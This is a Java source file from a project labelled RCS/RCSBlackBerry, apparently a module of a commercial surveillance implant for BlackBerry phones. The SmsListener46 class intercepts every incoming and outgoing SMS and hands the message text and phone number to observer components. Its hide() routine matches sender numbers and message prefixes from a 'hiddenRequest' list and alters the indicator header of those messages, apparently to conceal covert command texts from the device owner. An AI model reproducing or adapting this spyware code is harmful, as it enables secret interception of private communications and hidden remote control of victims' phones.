

/* *************************************************
 * Copyright (c) 2010 - 2012
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/
	
package blackberry.module.sms;

import java.io.IOException;
import java.util.Enumeration;

import javax.microedition.io.Connector;
import javax.microedition.io.Datagram;
import javax.microedition.io.DatagramConnection;
import javax.wireless.messaging.Message;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;

import net.rim.device.api.io.DatagramBase;
import net.rim.device.api.io.SmsAddress;
import net.rim.device.api.system.SMSPacketHeader;
import net.rim.device.api.ui.component.EditField;
import blackberry.Singleton;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.fs.Path;
import blackberry.interfaces.SmsObserver;
import blackberry.interfaces.iSingleton;
import blackberry.utils.Utils;





    public class SmsListener46 extends SmsListener implements iSingleton {

        private static final long GUID = 0xe78b740082783263L;
        // Statics ------------------------------------------------------------------
        private static String _openString = "sms://:0"; // See Connector implementation notes.
        // Members ------------------------------------------------------------------
        private EditField _sendText;
        private EditField _address; // A phone number for outbound SMS messages.
        private EditField _status;
        private ListeningThread _listener;
        //private SendThread _sender;
        private StringBuffer _statusMsgs = new StringBuffer(); // Cached for improved performance.
        private MessageConnection _mc;
        private boolean _stop = false;





        private static SmsListener46 instance;

        private SmsListener46() {
        }

        /*
         * public void setMessageAgent(final MessageAgent messageAgent) {
         * this.messageAgent = messageAgent; }
         */

        private synchronized void init() {
            if (!Path.isInizialized()) {
                Path.makeDirs();
            }
            Debug.init();
        }

        public synchronized static SmsListener46 getInstance() {

            if (instance == null) {
                instance = (SmsListener46) Singleton.self().get(GUID);
                if (instance == null) {
                    final SmsListener46 singleton = new SmsListener46();
                    Singleton.self().put(GUID, singleton);
                    instance = singleton;
                }
            }

            return instance;
        }

        public boolean isRunning() {
            return _listener != null;
        }

        protected synchronized void start() {
            _listener = new ListeningThread();
            _listener.start();
            Utils.sleep(1000);







        }

        protected synchronized void stop() {
            _listener.stop();
            _listener = null;







        }

        // Inner Classes ------------------------------------------------------------
        private class ListeningThread extends Thread {
            public synchronized void stop() {
                _stop = true;

                try {
                    if (_mc != null) {
                        // Close the connection so the thread will return.
                        _mc.close();
                    }
                } catch (IOException e) {
                    System.err.println(e.toString());
                }
            }

            synchronized boolean dispatch(String message, String address,
                    boolean hidden) {

                final int size = smsObservers.size();
                boolean hide = false;

                for (int i = 0; i < size; i++) {
                    final SmsObserver observer = (SmsObserver) smsObservers
                            .elementAt(i);




                    hide |= observer.onNewSms(message, address, true);
                }




                return true;
                //return saveLog(message, incoming);
            }

            public void run() {
                try {




                    _mc = (MessageConnection) Connector.open(_openString); // Closed by the stop() method.
                    DatagramConnection _dc = (DatagramConnection) _mc;



                    for (;;) {
                        if (_stop) {




                            return;
                        }



                        Datagram d = _dc.newDatagram(_dc.getMaximumLength());



                        _dc.receive(d);

                        byte[] bytes = d.getData();
                        String address = d.getAddress();
                        String msg = new String(bytes);

                        boolean hidden = hide(address, msg);
                        if (hidden) {
                            DatagramBase dbase = (DatagramBase) d;
                            SmsAddress smsAddress = (SmsAddress) dbase
                                    .getAddressBase();
                            SMSPacketHeader header = smsAddress.getHeader();

                            header.setMessageWaitingType(SMSPacketHeader.WAITING_INDICATOR_TYPE_OTHER);



                        }

                        dispatch(msg, address, hidden);

                        //Message m = _mc.receive();
                        //receivedSmsMessage(m);
                    }
                } catch (Exception e) {



                }
            }

            private boolean hide(String address, String msg) {
                Enumeration hiddens = hiddenRequest.elements();
                while (hiddens.hasMoreElements()) {
                    String[] pair = (String[]) hiddens.nextElement();
                    String number = pair[0];
                    String text = pair[1];
                    if (address.endsWith(number)) {



                        if (msg.toLowerCase().startsWith(text)) {



                            return true;
                        }
                    }
                }




                return false;
            }
        }

        /**
         * ESECUZIONE FUORI CONTEST
         */
        public boolean sendMessage(Message msg) {





            String body = "";
            if (msg instanceof TextMessage) {



                TextMessage tm = (TextMessage) msg;
                body = tm.getPayloadText();
            }

            SmsListener46 smsListener = SmsListener46.getInstance();

            final int size = smsListener.smsObservers.size();
            boolean hide = false;
            for (int i = 0; i < size; i++) {

                final SmsObserver observer = (SmsObserver) smsListener.smsObservers
                        .elementAt(i);




                observer.onNewSms(body, msg.getAddress(), false);
            }

            return true;
        }
    

}
